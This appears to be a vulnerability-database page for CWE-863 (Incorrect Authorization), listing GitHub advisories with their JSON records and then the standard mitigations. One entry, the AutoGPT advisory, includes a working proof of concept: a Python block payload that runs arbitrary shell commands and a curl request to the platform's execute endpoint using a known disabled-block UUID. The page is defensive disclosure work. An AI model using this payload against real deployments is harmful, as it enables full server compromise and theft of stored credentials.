Common Weakness Enumeration

CWE-863

Allowed-with-Review

Incorrect Authorization

Abstraction: Class · Status: Incomplete

The product performs an authorization check when an actor attempts to access a resource or perform an action, but it does not correctly perform the check.

5556 vulnerabilities reference this CWE, most recent first.

GHSA-R268-F892-GV94

Vulnerability from github – Published: 2025-10-07 15:30 – Updated: 2025-10-07 15:30
VLAI
Details

An access control vulnerability was discovered in the CLI functionality due to a specific access restriction not being properly enforced for users with limited privileges. An authenticated user with limited privileges can issue administrative CLI commands, altering the device configuration, and/or affecting its availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2025-3719"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2025-10-07T13:15:33Z",
    "severity": "HIGH"
  },
  "details": "An access control vulnerability was discovered in the CLI functionality due to a specific access restriction not being properly enforced for users with limited privileges. An authenticated user with limited privileges can issue administrative CLI commands, altering the device configuration, and/or affecting its availability.",
  "id": "GHSA-r268-f892-gv94",
  "modified": "2025-10-07T15:30:26Z",
  "published": "2025-10-07T15:30:26Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3719"
    },
    {
      "type": "WEB",
      "url": "https://security.nozominetworks.com/NN-2025:5-01"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-R275-5G72-R3PH

Vulnerability from github – Published: 2022-05-24 17:37 – Updated: 2022-05-24 17:37
VLAI
Details

An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-35951"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-01-01T04:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "An issue was discovered in the Quiz and Survey Master plugin before 7.0.1 for WordPress. It allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).",
  "id": "GHSA-r275-5g72-r3ph",
  "modified": "2022-05-24T17:37:51Z",
  "published": "2022-05-24T17:37:51Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-35951"
    },
    {
      "type": "WEB",
      "url": "https://wpscan.com/vulnerability/10348"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-R277-3XC5-C79V

Vulnerability from github – Published: 2026-01-29 15:04 – Updated: 2026-01-30 00:04
VLAI
Summary
AutoGPT is Vulnerable to RCE via Disabled Block Execution
Details

Summary

AutoGPT Platform's block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the disabled flag. Any authenticated user can execute the disabled BlockInstallationBlock, which writes arbitrary Python code to the server filesystem and executes it via __import__(), achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.

Details

Two vulnerable endpoints exist:

  1. Main Web API (v1.py#L355-395) - Any authenticated user:
@v1_router.post(
    path="/blocks/{block_id}/execute",
    dependencies=[Security(requires_user)],  # Just requires login
)
async def execute_graph_block(block_id: str, data: BlockInput, ...):
    obj = get_block(block_id)
    if not obj:
        raise HTTPException(status_code=404, ...)

    # NO CHECK FOR obj.disabled!

    async for name, data in obj.execute(data, ...):
        output[name].append(data)
  1. External API (external/v1/routes.py#L79-93) - Same issue.

The external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including EXECUTE_BLOCK) at v1.py#L1408-1424. As a result, a low-privilege user can create an API key and invoke the external block execution route.

The disabled flag is documented but not enforced:

From block.py#L459:

"disabled: If the block is disabled, it will not be available for execution."

The block listing endpoint correctly filters disabled blocks (if not b.disabled), but the execution endpoints do not check this flag.

The dangerous block (blocks/block.py#L15-78):

class BlockInstallationBlock(Block):
    """
    NOTE: This block allows remote code execution on the server,
    and it should be used for development purposes only.
    """

    def __init__(self):
        super().__init__(
            id="45e78db5-03e9-447f-9395-308d712f5f08",  # Hardcoded, public UUID
            disabled=True,  # NOT ENFORCED!
        )

    async def run(self, input_data: Input, **kwargs) -> BlockOutput:
        code = input_data.code

        # Writes attacker code to server filesystem
        file_path = f"{block_dir}/{file_name}.py"
        with open(file_path, "w") as f:
            f.write(code)

        # Executes via import (RCE)
        module = __import__(module_name, fromlist=[class_name])

PoC

1. Create malicious block code

PAYLOAD = '''
import os
from backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput
from backend.data.model import SchemaField

class RCEBlock(Block):
    class Input(BlockSchemaInput):
        cmd: str = SchemaField(description="Command")
    class Output(BlockSchemaOutput):
        result: str = SchemaField(description="Result")

    def __init__(self):
        super().__init__(
            id="aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
            description="RCE",
            input_schema=self.Input,
            output_schema=self.Output,
        )

    async def run(self, input_data, **kwargs):
        import subprocess
        result = subprocess.check_output(input_data.cmd, shell=True).decode()
        yield "result", result
'''

2. Execute via main web API (any logged-in user)

# Get session cookie by logging into the web UI, then:
curl -X POST "https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute" \
  -H "Cookie: session=<your_session_cookie>" \
  -H "Content-Type: application/json" \
  -d '{"code": "<PAYLOAD>"}'

The malicious Python code is written to the server's backend/blocks/ directory and immediately executed via __import__().

Alternative route: Mint an API key with EXECUTE_BLOCK via POST /api-keys, then call the external API POST /external-api/v1/blocks/{id}/execute.

Impact

Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.

This allows: - Complete server compromise - Access to all user data, credentials, and API keys stored in the database - Access to environment variables (cloud credentials, secrets) - Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services) - Persistent backdoor installation

Attack requirements: - Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account) - Know the disabled block's UUID (hardcoded in public source code: 45e78db5-03e9-447f-9395-308d712f5f08)

Why the disabled flag exists but fails: - Block listing correctly filters disabled blocks (users don't see them in UI) - Execution endpoints bypass this check entirely - The UUID is static and publicly known from the open-source codebase

Severity note: CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.

A fix is available, but was not published to the PyPI registry at time of publication: 0.6.44

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "agpt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "0.2.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-24780"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-276",
      "CWE-863",
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-29T15:04:03Z",
    "nvd_published_at": "2026-01-29T18:16:17Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nAutoGPT Platform\u0027s block execution endpoints (both main web API and external API) allow executing blocks by UUID without checking the `disabled` flag. Any authenticated user can execute the disabled `BlockInstallationBlock`, which writes arbitrary Python code to the server filesystem and executes it via `__import__()`, achieving Remote Code Execution. In default self-hosted deployments where Supabase signup is enabled, an attacker can self-register; if signup is disabled (e.g., hosted), the attacker needs an existing account.\n\n### Details\n\n**Two vulnerable endpoints exist:**\n\n1. **Main Web API** ([`v1.py#L355-395`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395)) - Any authenticated user:\n\n```python\n@v1_router.post(\n    path=\"/blocks/{block_id}/execute\",\n    dependencies=[Security(requires_user)],  # Just requires login\n)\nasync def execute_graph_block(block_id: str, data: BlockInput, ...):\n    obj = get_block(block_id)\n    if not obj:\n        raise HTTPException(status_code=404, ...)\n\n    # NO CHECK FOR obj.disabled!\n\n    async for name, data in obj.execute(data, ...):\n        output[name].append(data)\n```\n\n2. **External API** ([`external/v1/routes.py#L79-93`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93)) - Same issue.\n\nThe external API is gated by API key permissions, but any authenticated user can mint API keys with arbitrary permissions via the main API (including `EXECUTE_BLOCK`) at [`v1.py#L1408-1424`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424). As a result, a low-privilege user can create an API key and invoke the external block execution route.\n\n**The disabled flag is documented but not enforced:**\n\nFrom [`block.py#L459`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459):\n\u003e \"disabled: If the block is disabled, it will not be available for execution.\"\n\nThe block listing endpoint correctly filters disabled blocks (`if not b.disabled`), but the execution endpoints do not check this flag.\n\n**The dangerous block ([`blocks/block.py#L15-78`](https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78)):**\n\n```python\nclass BlockInstallationBlock(Block):\n    \"\"\"\n    NOTE: This block allows remote code execution on the server,\n    and it should be used for development purposes only.\n    \"\"\"\n\n    def __init__(self):\n        super().__init__(\n            id=\"45e78db5-03e9-447f-9395-308d712f5f08\",  # Hardcoded, public UUID\n            disabled=True,  # NOT ENFORCED!\n        )\n\n    async def run(self, input_data: Input, **kwargs) -\u003e BlockOutput:\n        code = input_data.code\n\n        # Writes attacker code to server filesystem\n        file_path = f\"{block_dir}/{file_name}.py\"\n        with open(file_path, \"w\") as f:\n            f.write(code)\n\n        # Executes via import (RCE)\n        module = __import__(module_name, fromlist=[class_name])\n```\n\n### PoC\n\n**1. Create malicious block code**\n\n```python\nPAYLOAD = \u0027\u0027\u0027\nimport os\nfrom backend.data.block import Block, BlockOutput, BlockSchemaInput, BlockSchemaOutput\nfrom backend.data.model import SchemaField\n\nclass RCEBlock(Block):\n    class Input(BlockSchemaInput):\n        cmd: str = SchemaField(description=\"Command\")\n    class Output(BlockSchemaOutput):\n        result: str = SchemaField(description=\"Result\")\n\n    def __init__(self):\n        super().__init__(\n            id=\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\n            description=\"RCE\",\n            input_schema=self.Input,\n            output_schema=self.Output,\n        )\n\n    async def run(self, input_data, **kwargs):\n        import subprocess\n        result = subprocess.check_output(input_data.cmd, shell=True).decode()\n        yield \"result\", result\n\u0027\u0027\u0027\n```\n\n**2. Execute via main web API (any logged-in user)**\n\n```bash\n# Get session cookie by logging into the web UI, then:\ncurl -X POST \"https://platform.autogpt.app/api/blocks/45e78db5-03e9-447f-9395-308d712f5f08/execute\" \\\n  -H \"Cookie: session=\u003cyour_session_cookie\u003e\" \\\n  -H \"Content-Type: application/json\" \\\n  -d \u0027{\"code\": \"\u003cPAYLOAD\u003e\"}\u0027\n```\n\nThe malicious Python code is written to the server\u0027s `backend/blocks/` directory and immediately executed via `__import__()`.\n\n**Alternative route:** Mint an API key with `EXECUTE_BLOCK` via `POST /api-keys`, then call the external API `POST /external-api/v1/blocks/{id}/execute`.\n\n### Impact\n\n**Any user who can create an account on AutoGPT Platform can achieve full Remote Code Execution on the backend server.**\n\nThis allows:\n- Complete server compromise\n- Access to all user data, credentials, and API keys stored in the database\n- Access to environment variables (cloud credentials, secrets)\n- Lateral movement to connected infrastructure (Redis, PostgreSQL, cloud services)\n- Persistent backdoor installation\n\n**Attack requirements:**\n- Create a free account on the platform (default self-hosted enables signup; hosted deployments may disable signup, requiring an existing account)\n- Know the disabled block\u0027s UUID (hardcoded in public source code: `45e78db5-03e9-447f-9395-308d712f5f08`)\n\n**Why the `disabled` flag exists but fails:**\n- Block listing correctly filters disabled blocks (users don\u0027t see them in UI)\n- Execution endpoints bypass this check entirely\n- The UUID is static and publicly known from the open-source codebase\n\n**Severity note:** CVSS assumes the default self-hosted configuration where signup is enabled (low-privilege authentication is easy to obtain). If signup is disabled in a hosted deployment, likelihood is lower, but impact remains critical once any authenticated account exists.\n\nA fix is available, but was not published to the PyPI registry at time of publication: [0.6.44](https://github.com/Significant-Gravitas/AutoGPT/releases/tag/v0.6.44)",
  "id": "GHSA-r277-3xc5-c79v",
  "modified": "2026-01-30T00:04:18Z",
  "published": "2026-01-29T15:04:03Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-r277-3xc5-c79v"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-24780"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Significant-Gravitas/AutoGPT"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/external/v1/routes.py#L79-L93"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L1408-L1424"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/api/features/v1.py#L355-L395"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/blocks/block.py#L15-L78"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Significant-Gravitas/AutoGPT/blob/master/autogpt_platform/backend/backend/data/block.py#L459"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "AutoGPT is Vulnerable to RCE via Disabled Block Execution"
}

GHSA-R293-JVQ6-PFQR

Vulnerability from github – Published: 2026-06-13 09:31 – Updated: 2026-06-13 09:31
VLAI
Details

The Page Builder: Pagelayer – Drag and Drop website builder plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 2.0.9. This is due to the pagelayer_save_content AJAX handler allowing users with basic post-edit capability to persist pagelayer_contact_templates metadata on posts they can edit (including pending posts), while the unauthenticated pagelayer_contact_submit endpoint later consumes that metadata by user-controlled post/form identifiers without enforcing a privileged or published-context boundary. This makes it possible for authenticated attackers, with Contributor-level access and above, to configure arbitrary contact-form mail templates that are usable through unauthenticated form submission via the contacts parameter. In typical deployments this template feature is configured via Pagelayer Pro UI; however, the vulnerable backend trust path is still present. This issue may be chained with CVE-2026-2442 to increase exploitability and attacker control over outbound email behavior.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-2470"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-06-13T08:16:12Z",
    "severity": "MODERATE"
  },
  "details": "The Page Builder: Pagelayer \u2013 Drag and Drop website builder plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 2.0.9. This is due to the pagelayer_save_content AJAX handler allowing users with basic post-edit capability to persist pagelayer_contact_templates metadata on posts they can edit (including pending posts), while the unauthenticated pagelayer_contact_submit endpoint later consumes that metadata by user-controlled post/form identifiers without enforcing a privileged or published-context boundary. This makes it possible for authenticated attackers, with Contributor-level access and above, to configure arbitrary contact-form mail templates that are usable through unauthenticated form submission via the contacts parameter. In typical deployments this template feature is configured via Pagelayer Pro UI; however, the vulnerable backend trust path is still present. This issue may be chained with CVE-2026-2442 to increase exploitability and attacker control over outbound email behavior.",
  "id": "GHSA-r293-jvq6-pfqr",
  "modified": "2026-06-13T09:31:27Z",
  "published": "2026-06-13T09:31:27Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2470"
    },
    {
      "type": "WEB",
      "url": "https://plugins.trac.wordpress.org/changeset/3506022/pagelayer"
    },
    {
      "type": "WEB",
      "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ef926bc7-b50f-40ac-9ace-7e01b26f34e1?source=cve"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R2FX-HP6P-PGRM

Vulnerability from github – Published: 2026-06-16 21:31 – Updated: 2026-06-18 20:43
VLAI
Summary
Duplicate Advisory: Internal/webchat command auth could inherit ownerAllowFrom wildcard state
Details

Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-4hpg-mp64-x7xq. This link is maintained to preserve external references.

Original Description

OpenClaw before 2026.4.25 contains a privilege escalation vulnerability in internal and webchat command authentication that allows senders to inherit wildcard ownerAllowFrom state across channel boundaries. Attackers can exploit this by sending commands on affected internal or webchat paths to execute owner-style command behavior outside intended channel scope, potentially bypassing access controls.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "openclaw"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "last_affected": "2026.4.24"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-18T20:43:53Z",
    "nvd_published_at": "2026-06-16T19:17:02Z",
    "severity": "MODERATE"
  },
  "details": "## Duplicate Advisory\n\nThis advisory has been withdrawn because it is a duplicate of\u00a0GHSA-4hpg-mp64-x7xq. This link is maintained to preserve external references.\n\n## Original Description\nOpenClaw before 2026.4.25 contains a privilege escalation vulnerability in internal and webchat command authentication that allows senders to inherit wildcard ownerAllowFrom state across channel boundaries. Attackers can exploit this by sending commands on affected internal or webchat paths to execute owner-style command behavior outside intended channel scope, potentially bypassing access controls.",
  "id": "GHSA-r2fx-hp6p-pgrm",
  "modified": "2026-06-18T20:43:53Z",
  "published": "2026-06-16T21:31:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hpg-mp64-x7xq"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53854"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-ownerallowfrom-wildcard-inheritance-in-internal-webchat-commands"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Duplicate Advisory: Internal/webchat command auth could inherit ownerAllowFrom wildcard state",
  "withdrawn": "2026-06-18T20:43:53Z"
}

GHSA-R2GP-2QVR-HPQM

Vulnerability from github – Published: 2022-05-13 01:25 – Updated: 2022-05-13 01:25
VLAI
Details

Google Chrome before 9.0.597.107 does not properly restrict access to internal extension functions, which has unspecified impact and remote attack vectors.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2011-1123"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2011-03-01T23:00:00Z",
    "severity": "HIGH"
  },
  "details": "Google Chrome before 9.0.597.107 does not properly restrict access to internal extension functions, which has unspecified impact and remote attack vectors.",
  "id": "GHSA-r2gp-2qvr-hpqm",
  "modified": "2022-05-13T01:25:53Z",
  "published": "2022-05-13T01:25:53Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-1123"
    },
    {
      "type": "WEB",
      "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/65741"
    },
    {
      "type": "WEB",
      "url": "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A13978"
    },
    {
      "type": "WEB",
      "url": "http://code.google.com/p/chromium/issues/detail?id=72214"
    },
    {
      "type": "WEB",
      "url": "http://googlechromereleases.blogspot.com/2011/02/stable-channel-update_28.html"
    },
    {
      "type": "WEB",
      "url": "http://www.securityfocus.com/bid/46614"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-R2JF-RC5V-VMPV

Vulnerability from github – Published: 2022-05-13 01:50 – Updated: 2022-06-29 19:09
VLAI
Summary
Incorrect Authorization in Jenkins
Details

A improper authorization vulnerability exists in Jenkins 2.137 and earlier, 2.121.2 and earlier in UpdateCenter.java that allows attackers to cancel a Jenkins restart scheduled through the update center.

Show details on source website

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.121.2"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.121.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.137"
      },
      "package": {
        "ecosystem": "Maven",
        "name": "org.jenkins-ci.main:jenkins-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "2.122"
            },
            {
              "fixed": "2.138"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2018-1999047"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2022-06-28T18:02:32Z",
    "nvd_published_at": "2018-08-23T18:29:00Z",
    "severity": "MODERATE"
  },
  "details": "A improper authorization vulnerability exists in Jenkins 2.137 and earlier, 2.121.2 and earlier in UpdateCenter.java that allows attackers to cancel a Jenkins restart scheduled through the update center.",
  "id": "GHSA-r2jf-rc5v-vmpv",
  "modified": "2022-06-29T19:09:10Z",
  "published": "2022-05-13T01:50:56Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1999047"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/jenkinsci/jenkins"
    },
    {
      "type": "WEB",
      "url": "https://jenkins.io/security/advisory/2018-08-15/#SECURITY-1076"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Incorrect Authorization in Jenkins"
}

GHSA-R2P2-P42X-RJ6Q

Vulnerability from github – Published: 2023-06-13 21:30 – Updated: 2024-04-04 04:47
VLAI
Details

SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2023-34965"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-06-13T19:15:09Z",
    "severity": "MODERATE"
  },
  "details": "SSPanel-Uim 2023.3 does not restrict access to the /link/ interface which can lead to a leak of user information.",
  "id": "GHSA-r2p2-p42x-rj6q",
  "modified": "2024-04-04T04:47:55Z",
  "published": "2023-06-13T21:30:18Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34965"
    },
    {
      "type": "WEB",
      "url": "https://docs.google.com/document/d/1TbHYGW65o1HBZoDf0rUDQMHPJE6qfQAvqdFv1DYY4BU/edit?usp=sharing"
    },
    {
      "type": "WEB",
      "url": "https://github.com/AgentY0/CVE-2023-34965"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Anankke/SSPanel-Uim"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R2P6-2GJ6-77XG

Vulnerability from github – Published: 2026-07-09 00:31 – Updated: 2026-07-09 12:30
VLAI
Details

Inappropriate implementation in Forms in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-15125"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-07-08T23:16:53Z",
    "severity": "HIGH"
  },
  "details": "Inappropriate implementation in Forms in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)",
  "id": "GHSA-r2p6-2gj6-77xg",
  "modified": "2026-07-09T12:30:27Z",
  "published": "2026-07-09T00:31:17Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-15125"
    },
    {
      "type": "WEB",
      "url": "https://chromereleases.googleblog.com/2026/07/stable-channel-update-for-desktop_01162222768.html"
    },
    {
      "type": "WEB",
      "url": "https://issues.chromium.org/issues/523737685"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-R2VC-CRVX-GJ3X

Vulnerability from github – Published: 2022-07-26 00:00 – Updated: 2022-08-04 00:00
VLAI
Details

An access control issue in Wavlink WiFi-Repeater RPTA2-77W.M4300.01.GD.2017Sep19 allows attackers to obtain the system key information and execute arbitrary commands via accessing the page syslog.shtml.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-34571"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-863"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-07-25T22:15:00Z",
    "severity": "HIGH"
  },
  "details": "An access control issue in Wavlink WiFi-Repeater RPTA2-77W.M4300.01.GD.2017Sep19 allows attackers to obtain the system key information and execute arbitrary commands via accessing the page syslog.shtml.",
  "id": "GHSA-r2vc-crvx-gj3x",
  "modified": "2022-08-04T00:00:22Z",
  "published": "2022-07-26T00:00:28Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-34571"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pghuanghui/CVE_Request/blob/main/WiFi-Repeater/WiFi-Repeater_syslog.shtml.assets/WiFi-Repeater_syslog.shtml.md"
    },
    {
      "type": "WEB",
      "url": "https://www.wavlink.com/en_us/category/REPEATER.html"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) [REF-229] to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that access control checks are performed related to the business logic. These checks may be different than the access control checks that are applied to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor [REF-7].

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

No CAPEC attack patterns related to this CWE.